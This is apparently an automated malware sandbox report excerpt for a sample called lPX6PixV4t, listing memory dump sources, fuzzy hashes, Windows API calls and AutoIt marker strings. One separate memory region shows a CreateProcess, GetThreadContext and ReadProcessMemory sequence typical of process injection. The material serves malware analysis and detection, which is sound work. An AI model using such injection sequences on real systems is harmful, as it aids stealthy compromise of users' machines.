                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                          • String ID: X$pWH
                          • API String ID: 85490731-941433119
                          • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                          • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                          • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                          • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                          APIs
                          • _wcslen.LIBCMT ref: 00401B11
                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                          • _memmove.LIBCMT ref: 00401B57
                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                          • String ID: @EXITCODE
                          • API String ID: 2734553683-3436989551
                          • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                          • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                          • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                          • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: __filbuf__getptd_noexit__read_memcpy_s
                          • String ID:
                          • API String ID: 1794320848-0
                          • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                          • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                          • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                          • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                          APIs
                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: IconNotifyShell_
                          • String ID:
                          • API String ID: 1144537725-0
                          • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                          • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                          • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                          • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                          APIs
                          • _malloc.LIBCMT ref: 0043214B
                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                          • _malloc.LIBCMT ref: 0043215D
                          • _malloc.LIBCMT ref: 0043216F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _malloc$AllocateHeap
                          • String ID:
                          • API String ID: 680241177-0
                          • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                          • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                          • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                          • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                          APIs
                          • TranslateMessage.USER32(?), ref: 00409556
                          • DispatchMessageW.USER32(?), ref: 00409561
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Message$DispatchPeekTranslate
                          • String ID:
                          • API String ID: 4217535847-0
                          • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                          • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                          • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                          • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                          APIs
                            • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                          • _free.LIBCMT ref: 004295A0
                            • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                            • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                            • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                            • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                            • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                            • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                          • String ID: >>>AUTOIT SCRIPT<<<
                          • API String ID: 3938964917-2806939583
                          • Opcode ID: 69d1c1bcaececaf33fe9124615222b37314c09e14b721507f7704bc6f295293c
                          • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                          • Opcode Fuzzy Hash: 69d1c1bcaececaf33fe9124615222b37314c09e14b721507f7704bc6f295293c
                          • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                          Strings
                          • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _strcat
                          • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                          • API String ID: 1765576173-2684727018
                          • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                          • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                          • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                          • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID:
                          • API String ID: 1473721057-0
                          • Opcode ID: f800691a6c58702cf5a996edc2c5780f63a8d9386b34bd2a46259168d6db88b9
                          • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                          • Opcode Fuzzy Hash: f800691a6c58702cf5a996edc2c5780f63a8d9386b34bd2a46259168d6db88b9
                          • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                          APIs
                          • __wsplitpath.LIBCMT ref: 004678F7
                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                          • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ErrorLast__wsplitpath_malloc
                          • String ID:
                          • API String ID: 4163294574-0
                          • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                          • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                          • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                          • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                          APIs
                            • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                            • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                            • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                          • _strcat.LIBCMT ref: 0040F786
                            • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                            • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                          • String ID:
                          • API String ID: 3199840319-0
                          • Opcode ID: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                          • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                          • Opcode Fuzzy Hash: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                          • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                          APIs
                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                          • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                          • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                          • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                          APIs
                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                          • __lock_file.LIBCMT ref: 00414A8D
                            • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                          • __fclose_nolock.LIBCMT ref: 00414A98
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                          • String ID:
                          • API String ID: 2800547568-0
                          • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                          • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                          • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                          • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                          APIs
                          • __lock_file.LIBCMT ref: 00415012
                          • __ftell_nolock.LIBCMT ref: 0041501F
                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: __ftell_nolock__getptd_noexit__lock_file
                          • String ID:
                          • API String ID: 2999321469-0
                          • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                          • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                          • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                          • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                          APIs
                          • CreateProcessW.KERNELBASE(?,00000000), ref: 03F50F8B
                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03F51021
                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03F51043
                          Memory Dump Source
                          • Source File: 00000000.00000002.2150454290.0000000003F4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F4F000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3f4f000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                          • String ID:
                          • API String ID: 2438371351-0
                          • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                          • Instruction ID: e71cfd420d4af35b516c97784c8b955a4a61b1a90e042d02c1923e8a4fe2f3f4
                          • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                          • Instruction Fuzzy Hash: 9E12ED24E24658C6EB24DF60D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: 6d743864f950f4e8dd6af4daa6c332586bf39a41c922c31670318adef7ff7de3
                          • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                          • Opcode Fuzzy Hash: 6d743864f950f4e8dd6af4daa6c332586bf39a41c922c31670318adef7ff7de3
                          • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                          • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
